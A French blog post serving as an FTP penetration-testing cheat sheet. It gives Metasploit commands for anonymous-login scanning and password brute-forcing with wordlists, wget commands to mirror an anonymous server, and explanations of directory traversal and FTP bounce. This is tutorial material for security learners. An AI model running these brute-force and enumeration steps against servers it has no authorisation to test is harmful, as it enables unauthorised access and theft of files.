FTP – 21

1. Liste de commandes basiques

Connexion à un serveur ftp :

  • ftp <ip>

Lister fichiers dans un serveur ftp 

  • ls / dir

Récupérer un fichier dans un serveur ftp

  • get <nom du fichier>

2. Exploitation d’un serveur FTP mal configuré avec Metasploit :

  • msfconsole 
  • use auxiliary/scanner/ftp/anonymous
  • msf auxiliary(anonymous) >set rhosts <ip victime>
  • msf auxiliary(anonymous) >exploit

3. Exploitation d’un serveur FTP mal configuré avec Metasploit :

  • msfconsole 
  • use auxiliary/scanner/ftp/ftp_version
  • msf auxiliary(anonymous) >set rhosts <ip victime>
  • msf auxiliary(anonymous) >exploit

4. FTP sniffing and Brute Force Attack :

  • msfconsole 
  • use auxiliary/scanner/ftp/ftp_login
  • msf auxiliary(ftp_login) > set rhosts 192.168.01.106
  • msf auxiliary(ftp_login) > set user_file /root/Desktop/user.txt
  • msf auxiliary(ftp_login) > set pass_file /root/Desktop/pass.txt
  • msf auxiliary(ftp_login) > set stop_on_success true
  • msf auxiliary(ftp_login) > exploit

5. Directory Traversal Attack 

Une autre vulnérabilité FTP inclut les attaques de directory traversal dans lesquelles l’attaque réussie écrase ou crée des fichiers non autorisés qui sont stockés à l’extérieur du dossier racine Web.

6. Connexion anonyme

ftp <IP>
> anonymous
> anonymous
> ls -a # Lister tous les fichiers (même cachés)
> binary #Configurer la transmission en binaire au lieu d'ascii
> ascii #Configure la transmission vers l'ascii
> bye #exit


7. Connexion par le navigateur


Vous pouvez vous connecter à un serveur FTP à l’aide d’un navigateur (comme Firefox) en utilisant une URL comme :

ftp://anonymous:anonymous@10.10.10.98


8. Télécharger tous les fichiers à partir du FTP

wget -m ftp://anonymous:anonymous@10.10.10.98 #Télécharge tout
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Télécharge tout

8. FTP Bounce 

Le FTP Bounce signifie Rebond FTP. C’est un cas de spoofing d’adresse IP. Elle est basée sur une utilisation de la commande PORT du protocole FTP lorsque le serveur FTP est en mode actif. En effet, cette commande permet de se connecter à n’importe quel autre serveur distant, et à un port donné. Dans ce cas, il est possible que la sécurité du serveur cible soit compromis, dans le cas ou il effectue une vérification des adresses IP d’origine. En effet, l’adresse IP que le serveur cible verra sera l’adresse IP du serveur FTP, et non de l’adresse IP de l’attaquant. 

Ce petit schéma explique la technique utilisée : 

9. Fichiers de configuration

ftpusers
ftp.conf
proftpd.conf

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l’aide de votre compte WordPress.com. Déconnexion /  Changer )

Photo Google

Vous commentez à l’aide de votre compte Google. Déconnexion /  Changer )

Image Twitter

Vous commentez à l’aide de votre compte Twitter. Déconnexion /  Changer )

Photo Facebook

Vous commentez à l’aide de votre compte Facebook. Déconnexion /  Changer )

Connexion à %s